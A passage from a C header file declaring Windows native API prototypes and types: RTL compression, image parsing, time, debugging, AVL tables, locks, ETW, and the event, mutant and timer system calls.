API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetCompressionWorkSpaceSize(\n    _In_ USHORT CompressionFormatAndEngine,\n    _Out_ PULONG CompressBufferWorkSpaceSize,\n    _Out_ PULONG CompressFragmentWorkSpaceSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCompressBuffer(\n    _In_ USHORT CompressionFormatAndEngine,\n    _In_reads_bytes_(UncompressedBufferSize) PUCHAR UncompressedBuffer,\n    _In_ ULONG UncompressedBufferSize,\n    _Out_writes_bytes_to_(CompressedBufferSize, *FinalCompressedSize) PUCHAR CompressedBuffer,\n    _In_ ULONG CompressedBufferSize,\n    _In_ ULONG UncompressedChunkSize,\n    _Out_ PULONG FinalCompressedSize,\n    _In_ PVOID WorkSpace);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDecompressBuffer(\n    _In_ USHORT CompressionFormat,\n    _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,\n    _In_ ULONG UncompressedBufferSize,\n    _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,\n    _In_ ULONG CompressedBufferSize,\n    _Out_ PULONG FinalUncompressedSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDecompressBufferEx(\n    _In_ USHORT CompressionFormat,\n    _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,\n    _In_ ULONG UncompressedBufferSize,\n    _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,\n    _In_ ULONG CompressedBufferSize,\n    _Out_ PULONG FinalUncompressedSize,\n    _In_ PVOID WorkSpace);\n\n/************************************************************************************\n*\n* RTL Image API.\n*\n************************************************************************************/\n\n#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)\n\nNTSYSAPI\nPIMAGE_NT_HEADERS\nNTAPI\nRtlImageNtHeader(\n    _In_ PVOID Base);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlImageNtHeaderEx(\n    _In_ ULONG Flags,\n    _In_ PVOID Base,\n    _In_ ULONG64 Size,\n  
  _Out_ PIMAGE_NT_HEADERS * OutHeaders);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlAddressInSectionTable(\n    _In_ PIMAGE_NT_HEADERS NtHeaders,\n    _In_ PVOID BaseOfImage,\n    _In_ ULONG VirtualAddress);\n\nNTSYSAPI\nPIMAGE_SECTION_HEADER\nNTAPI\nRtlSectionTableFromVirtualAddress(\n    _In_ PIMAGE_NT_HEADERS NtHeaders,\n    _In_ PVOID BaseOfImage,\n    _In_ ULONG VirtualAddress);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlImageDirectoryEntryToData(\n    _In_ PVOID BaseOfImage,\n    _In_ BOOLEAN MappedAsImage,\n    _In_ USHORT DirectoryEntry,\n    _Out_ PULONG Size);\n\nNTSYSAPI\nPIMAGE_SECTION_HEADER\nNTAPI\nRtlImageRvaToSection(\n    _In_ PIMAGE_NT_HEADERS NtHeaders,\n    _In_ PVOID Base,\n    _In_ ULONG Rva);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlImageRvaToVa(\n    _In_ PIMAGE_NT_HEADERS NtHeaders,\n    _In_ PVOID Base,\n    _In_ ULONG Rva,\n    _Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlFindExportedRoutineByName(\n    _In_ PVOID BaseOfImage,\n    _In_ PSTR RoutineName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGuardCheckLongJumpTarget(\n    _In_ PVOID PcValue,\n    _In_ BOOL IsFastFail,\n    _Out_ PBOOL IsLongJumpTarget);\n\n/************************************************************************************\n*\n* RTL Time API.\n*\n************************************************************************************/\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSecondsSince1970ToTime(\n    _In_ ULONG ElapsedSeconds,\n    _Out_ PLARGE_INTEGER Time);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTimeToSecondsSince1970(\n    _In_ PLARGE_INTEGER Time,\n    _Out_ PULONG ElapsedSeconds);\n\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSecondsSince1980ToTime(\n    _In_ ULONG ElapsedSeconds,\n    _Out_ PLARGE_INTEGER Time);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTimeToSecondsSince1980(\n    _In_ PLARGE_INTEGER Time,\n    _Out_ PULONG ElapsedSeconds);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlTimeToTimeFields(\n    _In_ PLARGE_INTEGER Time,\n    _Out_ PTIME_FIELDS TimeFields);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTimeFieldsToTime(\n    _In_ 
PTIME_FIELDS TimeFields,\n    _Out_ PLARGE_INTEGER Time);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSystemTimeToLocalTime(\n    _In_ PLARGE_INTEGER SystemTime,\n    _Out_ PLARGE_INTEGER LocalTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLocalTimeToSystemTime(\n    _In_ PLARGE_INTEGER LocalTime,\n    _Out_ PLARGE_INTEGER SystemTime);\n\nNTSYSAPI\nULONGLONG\nNTAPI\nRtlGetSystemTimePrecise(\n    VOID);\n\nNTSYSAPI\nLARGE_INTEGER\nNTAPI\nRtlGetInterruptTimePrecise(\n    _Out_ PLARGE_INTEGER PerformanceCounter);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlQueryUnbiasedInterruptTime(\n    _Out_ PLARGE_INTEGER InterruptTime);\n\nNTSYSAPI\nKSYSTEM_TIME\nNTAPI\nRtlGetSystemTimeAndBias(\n    _Out_ KSYSTEM_TIME TimeZoneBias,\n    _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveStart,\n    _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveEnd);\n\n/************************************************************************************\n*\n* RTL Debug Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nULONG\nSTDAPIVCALLTYPE\nDbgPrint(\n    _In_z_ _Printf_format_string_ PCCH Format,\n    ...);\n\nNTSYSAPI\nULONG\nSTDAPIVCALLTYPE\nDbgPrintEx(\n    _In_ ULONG ComponentId,\n    _In_ ULONG Level,\n    _In_z_ _Printf_format_string_ PCCH Format,\n    ...);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgQueryDebugFilterState(\n    _In_ ULONG ComponentId,\n    _In_ ULONG Level);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgSetDebugFilterState(\n    _In_ ULONG ComponentId,\n    _In_ ULONG Level,\n    _In_ BOOLEAN State);\n\nNTSYSAPI\nVOID\nNTAPI\nDbgUserBreakPoint(\n    VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nDbgBreakPoint(\n    VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiConnectToDbg(\n    VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nDbgUiSetThreadDebugObject(\n    _In_ HANDLE DebugObject);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiContinue(\n    _In_ PCLIENT_ID AppClientId,\n    _In_ NTSTATUS ContinueStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiStopDebugging(\n    _In_ HANDLE 
Process);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiDebugActiveProcess(\n    _In_ HANDLE Process);\n\nNTSYSAPI\n_Success_(return != 0)\nUSHORT\nNTAPI\nRtlCaptureStackBackTrace(\n    _In_ ULONG FramesToSkip,\n    _In_ ULONG FramesToCapture,\n    _Out_writes_to_(FramesToCapture, return) PVOID* BackTrace,\n    _Out_opt_ PULONG BackTraceHash);\n\n/************************************************************************************\n*\n* RTL AVL Tree API.\n*\n************************************************************************************/\n\ntypedef enum _TABLE_SEARCH_RESULT {\n    TableEmptyTree,\n    TableFoundNode,\n    TableInsertAsLeft,\n    TableInsertAsRight\n} TABLE_SEARCH_RESULT;\n\ntypedef enum _RTL_GENERIC_COMPARE_RESULTS {\n    GenericLessThan,\n    GenericGreaterThan,\n    GenericEqual\n} RTL_GENERIC_COMPARE_RESULTS;\n\n//\n// Add an empty typedef so that functions can reference\n// a pointer to the generic table struct before it is declared.\n//\n\n#if defined (__cplusplus)\nstruct _RTL_AVL_TABLE;\n#else\ntypedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;\ntypedef struct _RTL_AVL_TABLE *PRTL_AVL_TABLE;\n#endif\n\ntypedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(\n    _In_  struct _RTL_AVL_TABLE *Table,\n    _In_ PVOID FirstStruct,\n    _In_ PVOID SecondStruct\n    );\n\ntypedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(\n    _In_ struct _RTL_AVL_TABLE *Table,\n    _In_ ULONG ByteSize\n    );\n\ntypedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(\n    _In_  struct _RTL_AVL_TABLE *Table,\n    _In_ _Post_invalid_ PVOID Buffer\n    );\n\ntypedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(\n    _In_ struct _RTL_AVL_TABLE *Table,\n    _In_ PVOID UserData,\n    _In_ PVOID MatchData\n    );\n\ntypedef struct _RTL_BALANCED_LINKS {\n    struct _RTL_BALANCED_LINKS *Parent;\n    struct _RTL_BALANCED_LINKS *LeftChild;\n    struct _RTL_BALANCED_LINKS *RightChild;\n    CHAR Balance;\n    UCHAR Reserved[3];\n} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;\n\ntypedef 
struct _RTL_AVL_TABLE {\n    RTL_BALANCED_LINKS BalancedRoot;\n    PVOID OrderedPointer;\n    ULONG WhichOrderedElement;\n    ULONG NumberGenericTableElements;\n    ULONG DepthOfTree;\n    PRTL_BALANCED_LINKS RestartKey;\n    ULONG DeleteCount;\n    PRTL_AVL_COMPARE_ROUTINE CompareRoutine;\n    PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;\n    PRTL_AVL_FREE_ROUTINE FreeRoutine;\n    PVOID TableContext;\n} RTL_AVL_TABLE, *PRTL_AVL_TABLE;\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitializeGenericTableAvl(\n    _Out_ PRTL_AVL_TABLE Table,\n    _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,\n    _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,\n    _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,\n    _In_opt_ PVOID TableContext);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlInsertElementGenericTableAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_reads_bytes_(BufferSize) PVOID Buffer,\n    _In_ CLONG BufferSize,\n    _Out_opt_ PBOOLEAN NewElement);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlInsertElementGenericTableFullAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_reads_bytes_(BufferSize) PVOID Buffer,\n    _In_ CLONG BufferSize,\n    _Out_opt_ PBOOLEAN NewElement,\n    _In_ PVOID NodeOrParent,\n    _In_ TABLE_SEARCH_RESULT SearchResult);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDeleteElementGenericTableAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_ PVOID Buffer);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlLookupElementGenericTableAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_ PVOID Buffer);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlLookupElementGenericTableFullAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_ PVOID Buffer,\n    _Out_ PVOID *NodeOrParent,\n    _Out_ TABLE_SEARCH_RESULT *SearchResult);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEnumerateGenericTableAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_ BOOLEAN Restart);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEnumerateGenericTableWithoutSplayingAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _Inout_ PVOID *RestartKey);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlLookupFirstMatchingElementGenericTableAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    
_In_ PVOID Buffer,\n    _Out_ PVOID *RestartKey);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEnumerateGenericTableLikeADirectory(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,\n    _In_opt_ PVOID MatchData,\n    _In_ ULONG NextFlag,\n    _Inout_ PVOID *RestartKey,\n    _Inout_ PULONG DeleteCount,\n    _In_ PVOID Buffer);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlGetElementGenericTableAvl(\n    _In_ PRTL_AVL_TABLE Table,\n    _In_ ULONG I);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlNumberGenericTableElementsAvl(\n    _In_ PRTL_AVL_TABLE Table);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlIsGenericTableEmptyAvl(\n    _In_ PRTL_AVL_TABLE Table);\n\n/************************************************************************************\n*\n* RTL Critical Section Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlEnterCriticalSection(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLeaveCriticalSection(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nLOGICAL\nNTAPI\nRtlIsCriticalSectionLocked(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nLOGICAL\nNTAPI\nRtlIsCriticalSectionLockedByThread(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetCriticalSectionRecursionCount(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nLOGICAL\nNTAPI\nRtlTryEnterCriticalSection(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitializeCriticalSection(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlEnableEarlyCriticalSectionEventCreation(\n    VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitializeCriticalSectionAndSpinCount(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection,\n    _In_ ULONG SpinCount);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlSetCriticalSectionSpinCount(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection,\n    _In_ ULONG 
SpinCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDeleteCriticalSection(\n    _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\n/************************************************************************************\n*\n* RTL SRW Lock Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitializeSRWLock(\n    _Out_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquireSRWLockExclusive(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquireSRWLockShared(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleaseSRWLockExclusive(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleaseSRWLockShared(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTryAcquireSRWLockExclusive(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTryAcquireSRWLockShared(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquireReleaseSRWLockExclusive(\n    _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlUpdateClonedSRWLock(\n    _Inout_ PRTL_SRWLOCK SRWLock,\n    _In_ LOGICAL Shared);\n\n/************************************************************************************\n*\n* RTL UAC Support API.\n*\n************************************************************************************/\n\n// ElevationFlags is a bit mask; each flag below is a distinct bit.\n#define DBG_FLAG_ELEVATION_ENABLED        1\n#define DBG_FLAG_VIRTUALIZATION_ENABLED   2\n#define DBG_FLAG_INSTALLER_DETECT_ENABLED 4\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryElevationFlags(\n    _Inout_ ULONG *ElevationFlags);\n\n/************************************************************************************\n*\n* RTL Misc Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDoesFileExists_U(\n    _In_ PCWSTR FileName);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetLongestNtPathLength(\n    
VOID);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlAreLongPathsEnabled(\n    VOID);\n\n/************************************************************************************\n*\n* RTL Boundary Descriptor API.\n*\n************************************************************************************/\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlCreateBoundaryDescriptor(\n    _In_ PUNICODE_STRING Name,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlDeleteBoundaryDescriptor(\n    _In_ _Post_invalid_ PVOID BoundaryDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddSIDToBoundaryDescriptor(\n    _Inout_ PVOID *BoundaryDescriptor,\n    _In_ PSID RequiredSid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddIntegrityLabelToBoundaryDescriptor(\n    _Inout_ PVOID *BoundaryDescriptor,\n    _In_ PSID IntegrityLabel);\n\n/************************************************************************************\n*\n* RTL work item/async IO.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueueWorkItem(\n    _In_ WORKERCALLBACKFUNC Function,\n    _In_ PVOID Context,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetIoCompletionCallback(\n    _In_ HANDLE FileHandle,\n    _In_ APC_CALLBACK_FUNCTION CompletionProc,\n    _In_ ULONG Flags);\n\n/************************************************************************************\n*\n* RTL data exports.\n*\n************************************************************************************/\n\n#ifndef _M_X64\n#define RtlNtdllName L\"ntdll.dll\"\n#define RtlDosPathSeperatorsString ((UNICODE_STRING)RTL_CONSTANT_STRING(L\"\\\\/\"))\n#define RtlAlternateDosPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L\"/\"))\n#define RtlNtPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L\"\\\\\"))\n#else\nNTSYSAPI PWSTR RtlNtdllName;\nNTSYSAPI UNICODE_STRING RtlDosPathSeperatorsString;\nNTSYSAPI UNICODE_STRING RtlAlternateDosPathSeperatorString;\nNTSYSAPI UNICODE_STRING 
RtlNtPathSeperatorString;\n#endif\n\n/************************************************************************************\n*\n* ETW API.\n*\n************************************************************************************/\n\ntypedef VOID(NTAPI *PETWENABLECALLBACK)(\n    _In_ LPCGUID SourceId,\n    _In_ ULONG IsEnabled,\n    _In_ UCHAR Level,\n    _In_ ULONGLONG MatchAnyKeyword,\n    _In_ ULONGLONG MatchAllKeyword,\n    _In_opt_ /*EVENT_FILTER_DESCRIPTOR*/ PVOID FilterData,\n    _Inout_opt_ PVOID CallbackContext\n    );\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nEtwEventRegister(\n    _In_ LPCGUID ProviderId,\n    _In_opt_ PETWENABLECALLBACK EnableCallback,\n    _In_opt_ PVOID CallbackContext,\n    _Out_ PREGHANDLE RegHandle);\n\nNTSYSAPI\nULONG\nNTAPI\nEtwEventWriteNoRegistration(\n    _In_ LPCGUID ProviderId,\n    _In_ /*PCEVENT_DESCRIPTOR*/ PVOID EventDescriptor,\n    _In_ ULONG UserDataCount,\n    _In_reads_opt_(UserDataCount) /*PEVENT_DATA_DESCRIPTOR*/PVOID UserData);\n\n\n/*\n** Runtime Library API END\n*/\n\n/*\n** Native API START\n*/\n\n/************************************************************************************\n*\n* System Information API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nWINAPI\nNtQuerySystemInformation(\n    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\n    _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,\n    _In_ ULONG SystemInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySystemInformationEx(\n    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\n    _In_reads_bytes_(InputBufferLength) PVOID InputBuffer,\n    _In_ ULONG InputBufferLength,\n    _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,\n    _In_ ULONG SystemInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetSystemInformation(\n    _In_ SYSTEM_INFORMATION_CLASS 
SystemInformationClass,\n    _In_reads_bytes_opt_(SystemInformationLength) PVOID SystemInformation,\n    _In_ ULONG SystemInformationLength);\n\n/************************************************************************************\n*\n* Event (EventPair) API.\n*\n************************************************************************************/\n\ntypedef enum _EVENT_INFORMATION_CLASS {\n    EventBasicInformation\n} EVENT_INFORMATION_CLASS;\n\ntypedef enum _EVENT_TYPE {\n    NotificationEvent,\n    SynchronizationEvent\n} EVENT_TYPE;\n\ntypedef struct _EVENT_BASIC_INFORMATION {\n    EVENT_TYPE EventType;\n    LONG EventState;\n} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEvent(\n    _Out_ PHANDLE EventHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ EVENT_TYPE EventType,\n    _In_ BOOLEAN InitialState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenEvent(\n    _Out_ PHANDLE EventHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetEvent(\n    _In_ HANDLE EventHandle,\n    _Out_opt_ PLONG PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetEventEx(\n    _In_ HANDLE ThreadId,\n    _In_opt_ PRTL_SRWLOCK Lock);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtClearEvent(\n    _In_ HANDLE EventHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtResetEvent(\n    _In_ HANDLE EventHandle,\n    _Out_opt_ PLONG PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtPulseEvent(\n    _In_ HANDLE EventHandle,\n    _Out_opt_ PLONG PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyedEvent(\n    _Out_ PHANDLE KeyedEventHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryEvent(\n    _In_ HANDLE EventHandle,\n    _In_ EVENT_INFORMATION_CLASS EventInformationClass,\n    _Out_writes_bytes_(EventInformationLength) PVOID EventInformation,\n    _In_ ULONG 
EventInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEventPair(\n    _Out_ PHANDLE EventPairHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenEventPair(\n    _Out_ PHANDLE EventPairHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetLowEventPair(\n    _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetHighEventPair(\n    _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitLowEventPair(\n    _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitHighEventPair(\n    _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetLowWaitHighEventPair(\n    _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetHighWaitLowEventPair(\n    _In_ HANDLE EventPairHandle);\n\n/************************************************************************************\n*\n* Mutant API.\n*\n************************************************************************************/\n\ntypedef enum _MUTANT_INFORMATION_CLASS {\n    MutantBasicInformation,\n    MutantOwnerInformation\n} MUTANT_INFORMATION_CLASS;\n\ntypedef struct _MUTANT_BASIC_INFORMATION {\n    LONG CurrentCount;\n    BOOLEAN OwnedByCaller;\n    BOOLEAN AbandonedState;\n} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;\n\ntypedef struct _MUTANT_OWNER_INFORMATION {\n    CLIENT_ID ClientId;\n} MUTANT_OWNER_INFORMATION, *PMUTANT_OWNER_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateMutant(\n    _Out_ PHANDLE MutantHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ BOOLEAN InitialOwner);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenMutant(\n    _Out_ PHANDLE MutantHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryMutant(\n    _In_ HANDLE 
MutantHandle,\n    _In_ MUTANT_INFORMATION_CLASS MutantInformationClass,\n    _Out_writes_bytes_(MutantInformationLength) PVOID MutantInformation,\n    _In_ ULONG MutantInformationLength,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReleaseMutant(\n    _In_ HANDLE MutantHandle,\n    _Out_opt_ PLONG PreviousCount);\n\n/************************************************************************************\n*\n* Timer API.\n*\n************************************************************************************/\n\ntypedef VOID(*PTIMER_APC_ROUTINE) (\n    _In_ PVOID TimerContext,\n    _In_ ULONG TimerLowValue,\n    _In_ LONG TimerHighValue\n    );\n\ntypedef enum _TIMER_TYPE {\n    NotificationTimer,\n    SynchronizationTimer\n} TIMER_TYPE;\n\ntypedef enum _TIMER_INFORMATION_CLASS {\n    TimerBasicInformation\n} TIMER_INFORMATION_CLASS;\n\ntypedef struct _TIMER_BASIC_INFORMATION {\n    LARGE_INTEGER RemainingTime;\n    BOOLEAN TimerState;\n} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;\n\ntypedef enum _TIMER_SET_INFORMATION_CLASS {\n    TimerSetCoalescableTimer,\n    MaxTimerInfoClass\n} TIMER_SET_INFORMATION_CLASS;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTimer(\n    _Out_ PHANDLE TimerHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ TIMER_TYPE TimerType);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTimer2(\n    _Out_ PHANDLE TimerHandle,\n    _In_opt_ PVOID Reserved1,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG Attributes,\n    _In_ ACCESS_MASK DesiredAccess);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimer(\n    _In_ HANDLE TimerHandle,\n    _In_ PLARGE_INTEGER DueTime,\n    _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,\n    _In_opt_ PVOID TimerContext,\n    _In_ BOOLEAN WakeTimer,\n    _In_opt_ LONG Period,\n    _Out_opt_ PBOOLEAN PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetTimer2(\n    _In_ HANDLE TimerHandle,\n    _In_ PLARGE_INTEGER DueTime,\n    _In_opt_ 
